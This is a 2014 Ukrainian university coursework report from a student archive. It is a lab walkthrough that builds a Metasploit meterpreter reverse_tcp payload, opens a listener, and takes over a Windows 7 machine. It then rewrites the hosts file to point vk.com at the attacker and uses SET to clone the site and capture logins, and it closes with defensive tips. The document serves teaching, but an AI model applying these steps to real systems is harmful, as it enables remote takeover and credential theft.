Створення експлойта операційної системи Windows 7 для несанкціонованого віддаленого контролю з метою соціальної інженерії

Інформація про навчальний заклад

ВУЗ:
Національний університет Львівська політехніка
Інститут:
Інститут комп’ютерних технологій, автоматики та метрології
Факультет:
Захисту інформації
Кафедра:
Захист інформації

Інформація про роботу

Рік:
2014
Тип роботи:
Розрахункова робота
Предмет:
Безпека інформаційних і комунікаційних систем

Частина тексту файла (без зображень, графіків і формул):

МІНІСТЕРСТВО ОСВІТИ І НАУКИ УКРАЇНИ НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ “ЛЬВІВСЬКА ПОЛІТЕХНІКА” ІКТА кафедра ЗІ / РОЗРАХУНКОВА РОБОТА з навчальної дисципліни “Безпека інформаційно-комунікаційних систем” на тему “Створення експлойта операційної системи Windows 7 для несанкціонованого віддаленого контролю з метою соціальної інженерії” Львів – 2014 ВСТУП Зі стрімким розвитком апаратно-програмного забезпечення з’являються дедалі нові можливості для несанкціонованого перехоплення інформації зловмисниками. Незважаючи на постійну роботу виробників програмного забезпечення над безпекою свої продуктів, завжди існують недосліджені та не задокументовані можливості і вразливості, які можуть бути використані в злочинних цілях. Але якою би надійною не була програма чи операційна система, її найслабшою ланкою з позиції захисту інформації є людина. Це враховує соціальна інженерія – наука, що вивчає можливість отримання інформації унаслідок людської неуважності, використання простих паролів, не вживанні необхідних заходів безпеки тощо. У сучасних умовах зловмисники діють дедалі хитріше та витонченіше. Дедалі частіше для більшої ефективності та швидшого досягнення цілей вони поєднують декілька атак, комбінують методі та засоби. На сьогодні популярним рішенням є створення простих бінарних експлойтів з різноманітними цілями. Експлойт (від англ. exploit — експлуатувати) – це комп’ютерна програма, фрагмент програмного коду або послідовність команд, що використовують вразливості в програмному забезпеченні та призначені для проведення атаки на обчислювальну систему. На сьогодні у зловмисника з’являється можливість створення власних експлойтів без жодних знань і навиків програмування за допомогою набору утиліт Metasploit Framework. Великою перевагою застосування цього програмного забезпечення для зловмисників є те, що новостворений експлойт ще не міститься в антивірусних базах. Це дозволяє з дуже високою ймовірністю провести декілька безперешкодних і успішних атак. В даній роботі продемонстровані етапи створення та практичного застосування експлойта зворотнього з’єднання операційної системи Windows 7 з подальшим віддаленим контролем і фішинговою атакою, яка буде здійснена за допомогою набору утиліт Social Engineering Toolkit. ОБЛАДНАННЯ 1) Комп’ютер для здійснення атаки: – Операційна система: Kali Linux 1.0.6. – Локальна IP-адреса: 192.168.1.3 2) Комп’ютер-жертва: – Операційна система: Windows 7 Ultimate SP1 з останніми оновленнями та актуальними базами антивірусного програмного забезпечення. – Локальна IP-адреса: 192.168.1.2 ХІД РОБОТИ 1. Створення експлойта – виконання в терміналі команди msfpayload, призначеної для створення експлойта з необхідним навантаженням, в якості параметрів якої тип створюваного експлойта (windows/meterpreter/reverse_tcp); IP-адреса комп’ютера, який здійснює атаку (LHOST=192.168.1.3); довільний порт (LPORT=21); ім’я та шлях збереження виконавчого файлу (/root/Desktop/exploit.exe). / / Експлойт reverce_tcp при виконанні на машині жертви робить її сервером, тоді як комп’ютер зловмисника виступає клієнтом, та ініціює зворотнє TCP-з’єднання. Таке з’єднання застосовується для обходу обмежень міжмережевого екрану на відкриття портів, які зазвичай блокуються. При цьому міжмережевий екран не втручається у вихідний мережевий трафік. В звичайному з’єднанні клієнт з’єднується з сервером крізь відчинений порт сервера, але у випадку зворотнього з’єднання, клієнт відкриває порт, з яким з’єднується сервер. Таким чином експлойт, запущений на машині жертви, посилає TCP-пакет на машину атакуючого. Отримавши цей пакет, зловмисник дає команду вірусу ініціювати VNC-з’єднання (Virtual Network Computing) з комп’ютером жертви, використовуючи протокол RFB (Remote FrameBuffer), що дозволяє отримати повний віддалений контроль. Такий експлойт використовує вразливість операційної системи Windows, яка дає великі можливості програмам, запущеним користувачами. Цю вразливість можна перекрити лише частково, адже така особливість водночас є необхідністю для досягнення гнучкості та простоти виконання операцій. З часом виходять оновлення, які перекривають можливість застосування певних підвидів експлойтів, проте на сьогодні застосування reverse_tcp є актуальним. 2. Вхід в режим прослуховування відкритого порта – введення в терміналі команди msf для входу в консольний режим Metasploit Framework / – введення команди use exploit/multi/handler для переходу в консольний режим експлойта віддаленого керування / – введення команди set payload для встановлення необхідного навантаження, в якості параметра якої тип експлойта (/windows/meterpreter/reverse_tcp) / – введення команд set LHOST та set LPORT, щоб задати IP-адресу та порт комп’ютера, який буде використовуватися для прослуховування. Параметри 192.168.1.3 та 21 відповідно / – введення команди exploit для початку прослуховування / 3. Запуск експлойта на машині жертви. / Після того, як користувач запустив вірус, він відправляє TCP-пакет і утиліта, отримавши його, відкриває сесію віддаленого керування. / Таким чином отримується контроль над оболонкою Windows і зловмисник отримує можливість вводити команди в командному рядку. 4. Редагування файлу hosts операційної системи Windows hosts – текстовий файл, який містить список доменних імен та відповідних до них IP-адрес і використовується операційною системою для перетворення символьних доменних імен в IP-адреси. Має пріоритет над DNS-серверами і контролюється адміністратором комп’ютера. Використовується для перенаправлення доменів та блокування доступу до небажаних ресурсів (зокрема рекламних). У зловмисних цілях використовується для підміни сайтів на візуально схожі клони шляхом заміни IP-адреси ресурсу на адресу атакуючого комп’ютера для несанкціонованого збирання конфіденційної інформації. Така можливість і буде продемонстрована далі. – перехід до місця розташування файлу hosts виконанням консольної команди cd, використовуючи контроль над оболонкою системи Windows / – додавання рядка з IP-адресою 192.168.1.3 та доменним ім’ям vk.com у файл hosts командою echo / 5. Створення копії головної сторінки сайту vk.com – запуск консольного набору утиліт Social Engineering Toolkit / – вибір типу атаки Social-Engineering-Attacks / – вибір вектора спрямування атаки на веб-сайт / – вибір методу атаки (збір інформації) / – вибір способу створення копії (вручну) / – введення IP-адреси комп’ютера, який буде збирати дані (192.168.1.3) / – збереження головної сторінки сайту vk.com в папці /root/VK / / – введення шляху розташування копії сторінки (/root/VK) / – введення URL-адреси сторінки (https://www.vk.com) / Після цього запускається режим спостереження і збору інформації. / 6. Одержання конфіденційної інформації жертви Після переходу жертви на сайт vk.com, починається збір інформації, яка відображається у терміналі. / При цьому, коли користувач вводить логін та пароль, їх перехоплені значення містяться в полях POSSIBLE USERNAME та POSSIBLE PASSWORD. В нашому випадку логіном і паролем були слова test, які були несанкціоновано зчитані. При цьому після закінчення атаки її результат зберігається у текстовому файлі з можливістю подальшого використання у власних цілях. / ПІДСУМКИ РОБОТИ В даній роботі було показано як зловмисник може використати вразливість операційної системи у поєднанні з неуважністю користувача, щоб отримати несанкціонований віддалений контроль над системною. Було продемонстровано можливість використання цього доступу для здійснення фішингу. Але це далеко не всі можливості застосування такого експлойта. Він дозволяє також: – керувати роботою веб-камери, здійснювати приховану фотозйомку; – робити знімки екрана комп’ютера (скриншоти); – перехоплювати натиснення клавіш клавіатури і миші (кейлогер); – копіювати, модифікувати, видаляти файли комп’ютера; – змінювати будь-які налаштування системи тощо. На сьогодні повністю захистити комп’ютер від такого виду експлойтів неможливо, бо це можна зробити лише випуском оновлення для операційної системи. Однак, щоб зменшити шанси для зловмисників реалізувати такі атаки, можна виконати такі рекомендації: – завантажувати файли з Інтернету лише з перевірених і відомих джерел; – не запускати підозрілі файли, які мають малий чи невластивий розмір; – перед запуском файлів перевіряти їхні властивості. У експлойтів часто відсутній виробник або інші атрибути; – час від часу перевіряти статус портів комп’ютера командою netstat; – використовувати функцію збереження та автоматичного введення логінів та паролів; – використовувати прив’язку акантів до електронної пошти та номера мобільного телефону; – час від часу змінювати паролі.
Антиботан аватар за замовчуванням

18.04.2014 00:04-

Коментарі

Ви не можете залишити коментар. Для цього, будь ласка, увійдіть або зареєструйтесь.

Ділись своїми роботами та отримуй миттєві бонуси!

Маєш корисні навчальні матеріали, які припадають пилом на твоєму комп'ютері? Розрахункові, лабораторні, практичні чи контрольні роботи — завантажуй їх прямо зараз і одразу отримуй бали на свій рахунок! Заархівуй всі файли в один .zip (до 100 МБ) або завантажуй кожен файл окремо. Внесок у спільноту – це легкий спосіб допомогти іншим та отримати додаткові можливості на сайті. Твої старі роботи можуть приносити тобі нові нагороди!
Нічого не вибрано
0%

Оголошення від адміністратора

Антиботан аватар за замовчуванням

Подякувати Студентському архіву довільною сумою

Admin

26.02.2023 12:38

Дякуємо, що користуєтесь нашим архівом!